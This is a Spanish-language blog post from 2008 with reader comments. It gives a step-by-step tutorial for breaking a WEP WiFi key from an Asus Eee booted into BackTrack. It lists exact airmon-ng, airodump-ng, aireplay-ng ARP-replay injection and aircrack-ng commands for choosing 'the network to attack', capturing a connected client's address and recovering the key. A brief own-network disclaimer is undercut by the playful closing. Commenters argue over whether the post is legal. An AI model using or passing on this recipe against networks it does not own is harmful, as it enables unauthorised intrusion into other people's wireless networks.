Bienvenido

Este Blog es tú Blog. No es nada sin tú participación, ideas y sugerencias.

jueves, 11 de diciembre de 2008

Reventar red WiFi con Asus Eee

Debido a las numerosas e insistentes peticiones, hemos desarrollado este pequeño tutorial para hacer más fácil la realización de esta tarea.

Os recuerdo nuevamente que este proceso se puede realizar sobre nuestra propia red, si perdimos la clave por ejemplo, y solo en este caso.
Cualquier otro uso es, cuando menos, poco ortodoxo.


Partimos de la premisa de usar un Asus Eee, pues es uno de los equipos más sencillos y baratos que existen en el mercado.
De esta forma demostramos la facilidad de ejecución.
Esto a su vez nos acarrea pequeños problemas de logistica, no tiene lector de CD ni DVD, su disco duro es mínimo. Su microprocesador es pequeño, la pantalla es mínima,....

Necesitamos un PEN, o una tarjeta SD, particularmente usé una tarjeta SD de 1G.

Nos basaremos en nuestras propias instruciones:
Como reventar red WiFi


En primer lugar desde otro equipo necesitamos preparar la herramienta necesaria para proceder.

Vamos a usar el sistema operativo, BackTrack.
Que ya comentamos en : Back Track
Existe una versión especial para PEN que podemos descargar directamente desde aqui.
No obstante os recomiendo entrar en la pagina de descargas, así podrás estar seguro del checksum y de que es la última versión.
Guarda el fichero en tu ordenador, recomiendo el escritorio.

Existen varias maneras de grabar esta ISO al PEN o al SD.
Vamos a usar la más facil de ellas.

Necesitamos el programa UNetbootin, del cual hicimos uso en GNU/Linux en un PEN.
Para descargarlo lo mejor es ir a su propia pagina de descargas.
El sistema es múltiplataforma, baja el que requieras.
Si necesitas instrucciones más amplias remitete a nuestro anterior enlace, desde donde tienes referencias a más documentación.

En este punto, debemos de tener el programa UNetbooting instalado y la ISO del BackTrack.
Generamos el SD o PEN de arranque mandandole al programa que use nuestra imagen ISO sobre la memoria deseada.

Una vez terminado el proceso introducimos la memoria SD o el PEN, según nuestra decisión previa, en el Asus Eee y ya podemos proceder.


Reventando la RED

Introducimos la tarjeta SD o el PEN en el equipo, que ya debería de estar.
El Asus Eee por defecto arranca desde su HD, así que al arrancar entramos en la configuración de la BIOS.
Una vez allí en el BOOT seleccionamos el disco HD y elegimos nuestra memoria.
Guardamos y salimos.

Ahora ya nos arranca directamente nuestro BackTrack.

Una vez arrancado:

Primero activamos el servicio.
(Atención a partir de este punto prestar mucha atención a lo que se debe escribir en la consola, es un error muy habitual el saltarse los espacios en blanco, o poner demasiados, en esos casos nos indicara un error).

abrir consola, el icono está abajo a la izquierda.
airmon-ng start wifi0 11
wlanconfig ath0 destroy

En la misma consola, rastreamos para ver emisoras en la zona

airodump-ng --write test ath1

Terminar con Ctrl + C

Miramos y anotamos los datos de la red a atacar.
Cojer tambien los datos de un equipo que este conectado {STATION}

Rastreamos de nuevo, acotando el equipo objetivo:

Siendo BSSID el numero del tipo xx:xx:xx:xx:xx:xx

Siendo CHANNEL, el numero de canal usado

Los signos {} no deben escribirse

airodump-ng --bssid {BSSID} --channel {CHANNEL} --write capturas ath1

Ya estamos capturando, para acelerar el proceso debemos inyectar paquetes.

Para inyectar paquetes:

abrir consola nueva
aireplay-ng --arpreplay -b {BSSID} -h {STATION} ath1

La inyección real de paquetes puede tardar un rato, no es efectiva hasta que nos salga el número de paquetes inyectados en pantalla.


Para comprobar el resultado:

Abrir consola nueva

aircrack-ng -a 1 -s capturas-01.cap

Si se han efectuado varias capturas cambiara el número del fichero capturas, por ejemplo capturas-02.cap

El programa debe darnos una respuesta en breves segundos, si no dispone de suficientes paquetes, intentará romper la clave por fuerza bruta.
En este caso sal (CTRL + C) y espera un poco más.



Cuando el proceso termine tendremos en pantalla un bonito código, nuestro objetivo.

El proceso completo suele durar unos 10 minutos, y se requieren unos 100.000 paquetes, pero esto es muy relativo.

Para que el equipo quede como estaba debes de una vez apagado el Backtrack, retirar la tarjeta SD.

¡ A JUGAR !




5 comentarios :

  1. no he leido todo el post. demasiao largo, tú, para gente como yo. amás, el tema del pirateo debería estar baneao, como poco.
    cuando tenga un rato, ya te pregunto para que me informes, de manera legal, por supuesto, sobre esto.
    enga, un saludo

    ResponderEliminar
  2. Esto ami me sirve para comprobar la seguridad de mi red Inalámbrica. No para el pirateo de ninguna RED, Amás Gracias a este programita encontre una clave que a poco tardas 2 semanas en reventarla.
    Gracias por la info

    ResponderEliminar
  3. eso es ilegal, deberias quitarlo.

    ResponderEliminar
  4. tienes el enlace del back track antiguo,iva mejor que el nuevo .
    si lo tienes ponlo ,no lo encuentro

    ResponderEliminar
  5. En la pagina de descargas tienes desde la versión 1.0, de 2006. Solo entra en "older version".

    ResponderEliminar

Gracias por tu colaboración.